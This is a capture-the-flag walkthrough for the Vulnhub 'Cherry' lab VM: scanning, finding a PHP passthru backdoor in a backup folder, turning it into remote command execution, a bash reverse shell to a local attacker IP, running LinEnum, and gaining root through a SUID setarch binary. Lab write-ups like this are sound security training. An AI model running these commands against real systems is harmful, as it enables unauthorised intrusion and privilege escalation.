Table of Contents
After my frustratingly fun adventure with Vulnhub’s Chili image, I decided to continue along and try another image from the SunCSR Team. The next image I found that was considered easy was Cherry. No hint this time. Sounds like a good time, doesn’t it? Let’s dive in!
After discovering the IP address of my VM (
192.168.1.39), I went to work running an
nmap scan of the target system.
sudo nmap -sT -sC -sV -O -p- 192.168.1.39
Two web servers, OpenSSH, and “mysqlx?”.
The nginx server is running on port 80, while the apache server is running on 7755.
This is an abnormal port and would not have been picked up by a basic network scan.
Glad I used
-p- to scan all ports, otherwise I would have missed this.
Both nginx and Apache seem to be very update date, so I don’t think there will be some public exploits. OpenSSH is up to date as well. Let’s check out the main web server running on port 80
The nginx Web Server⌗
The main website revealed nothing spectacular, nor interesting. A large image of some cherries. Just like with Chili, there was nothing obvious web exploit vectors I could see from the main page.
Time to fire up
gobuster and see if theres something we can uncover.
gobuster dir -u 192.168.1.39 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
There’s a directory called
/backup we can access.
Going to the URL rejects us with a
403 Forbidden page.
That’s a shame….
Remember there was another web server running on a different port?! Okay let’s check that out!
The Apache Web Server⌗
Going to 192.168.1.39:7755 reveals the same basic page with nothing to go on.
This makes me wonder if both web servers are sharing the same web-root.
What if we try going to
/backup on the apache server?
We have access to the “forbidden” directory! There’s four files in there:
Let’s grab the loot and we can start some investigation.
mkdir -p ~/Documents/vulnhub/cherry cd ~/Documents/vulnhub/cherry for file in command.php latest.tar.gz master.zip master.zip.bak; do curl -s -O 192.168.1.39:7755/backup/$file; done ls -l -rw-r--r-- 1 kali kali 252 Sep 21 19:45 command.php -rw-r--r-- 1 kali kali 12983648 Sep 21 19:45 latest.tar.gz -rw-r--r-- 1 kali kali 11898973 Sep 21 19:45 master.zip -rw-r--r-- 1 kali kali 11898973 Sep 21 19:45 master.zip.bak
What are these backup files?⌗
I spent quite a bit of time going through these.
I get it, the
command.php is probably screaming at you.
Let me just say, something I’ve learned is to not rush into anything.
You can fall down a rabbit hole very quick that way and may end up retreating.
Extract this file using
tar xzvf latest.tar.gz
This was a folder called
wordpress and contained everything you would need to get your blog going.
But wordpress requires a database, and there was mysqlx? running on the server.
Perhaps theres a config file in there with some database credentials.
It was a vanilla release from wordpress with nothing set up.
master.zip & master.zip.bak⌗
Let’s unzip both these files and check out what they contain. Since one is a backup of the other, I’ll move them so I can work with both in the same directory.
unzip master.zip mv piranha.core master unzip master.zip.bak mv piranha.core master-bak
After some quick google-fu, I came across Piranha CMS. Something from the .NET Foundation. This is probably nothing. I ran a quick comparison to see if there was anything different between the backup and the current.
diff -r master master-bak/
Nothing, so they contain the same files.
A quick look through the
master folder revealed nothing.
Another vanilla download.
Let’s check out
cat on the file reveals the following juicy nugget:
<!-- </?php echo passthru($_GET['backup']); ?/> -->
Occam’s razor, right?
The simpler answer was correct.
It’s been awhile since my PHP days, but I know that
$_GET['backup'] will pull the value of the GET parameter
backup from the URL.
Then it gets passed into
According to the PHP manual:
passthru — Execute an external program and display raw output
That sounds lovely!
Let’s run a quick
ls test in our web browser by going to http://192.168.1.39:7755/backup/command.php?backup=ls
Excellent! We can execute commands through our web browser on the remote system. Time to exploit the machine!
Exploitation - Local Shell⌗
We have a crack in the armor, how can we leverage this to get a shell on the system? There’s a chance some files are exposed through this, but it would be tedious to traverse the entire system.
A Quick Enumeration⌗
The first thing I went for was
Maybe we can try to crack a password and SSH into the system.
HINT: When using the web browser, the output is not formatted nicely. If you start looking at files and executing commands it can be a pain to work with. Leverage Firefox’s
view-sourceURL command to view it in a pretty print. For example: view-source:http://192.168.1.39:7755/backup/command.php?backup=ls …or you can just use
cat /etc/passwd through the vulnerability we found confirms some of the suspicions from earlier.
www-dir user along with a
mysql user and group.
There’s a user called
During my enumeration I also tried a
which nc to see if netcat was available.
So I quickly tried to run a bind shell using
nc -lnvp 4444 -e /bin/bash.
The page loaded instantly.
If it was successful, the page would have hung in a loading state, waiting for the command to finish.
This is most likely caused by the version of
nc installed on the Ubuntu system is the OpenBSD netcat that removes netcat’s gaping security hole.
Had to try.
Let’s try something else.
I used a dead simple PHP reverse shell when exploiting Chili, could I use it again?
Looking at it’s source code, and removing the PHP part of it, the core of it executes
Since we can run any command we want from the URL, let’s take that and plug it in as the
backup GET parameter.
192.168.1.39:7755/backup/command.php?backup=/bin/bash -c ‘bash -i >& /dev/tcp/192.168.1.10/4444 0>&1’
If you’re following along, make sure to change 192.168.1.39 to your Cherry VM IP address and change 192.168.1.10 to your Kali machine IP address. Also, make sure to fire up a netcat listening server on your Kali machine!
Page loads instantly. Damn!
nc -lnvp 4444
There’s a lot of
& in there, that’s not great for URLs!
You can use an online URL encoder to transform it into something more usable for web browsers.
Make sure to just URL encode the command and paste it at the end of your URL
So now our URL looks like:
A lot of garbage, but put that in your browser…
I ran an automated Linux enumeration script: rebootuser/LinEnum.
cd /tmp curl -O https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh chmod +x LinEnum.sh ./LinEnum.sh -e /tmp
This was my first time using this script. There is a lot to go through from the results of this script. I’ll focus on the important pieces that came up. However, if you want to check out the results in its entirety, move the saved file to the web-root and download a copy.
[-] htpasswd found - could contain passwords: /etc/apache2/.htpasswd admin:$apr1$3SRFNcco$BUX4Qy6xh58F03LDqnPsW/ [-] /etc/init/ config file permissions: total 12 drwxr-xr-x 2 root root 4096 Sep 7 02:36 . drwxr-xr-x 97 root root 4096 Sep 7 04:14 .. -rw-r--r-- 1 root root 1757 Nov 6 2019 mysql.conf [+] Possibly interesting SUID files: -rwsr-sr-x 1 root root 27136 Apr 2 15:29 /usr/bin/setarch
The admin password can easily be cracked with
john, but I’ll leave that to the reader to solve.
The most striking piece was the SUID and the SGID files.
What they you ask?
I suggest you read up more about the sticky bit.
Long story short though, they can be abused.
Exploitation - Root Shell⌗
If you happend to find strage SUID or SGID files on a system, always check out GTFOBins to see if they can be used to get a
Looking at the documentation on GTFOBins.
Let’s run the command provided in the documentation.
setarch $(arch) /bin/sh -p
Just a blank screen.
Did it work?
Always check with
Excellent! To grab the flag:
whoami root cd /root ls proof.txt snap cat proof.txt Sun_CSR_TEAM.af6d45da1f1181347b9e2139f23c6a5b
Okay, I really enjoyed this one.
There were a lot misdirects and ways to try and trip you up.
If this were a real engagements, I feel there would have been a lot of extra effort to try and get the MySQL data.
But in this CTF style, I had a solid focus on getting
Looking forward to the next one!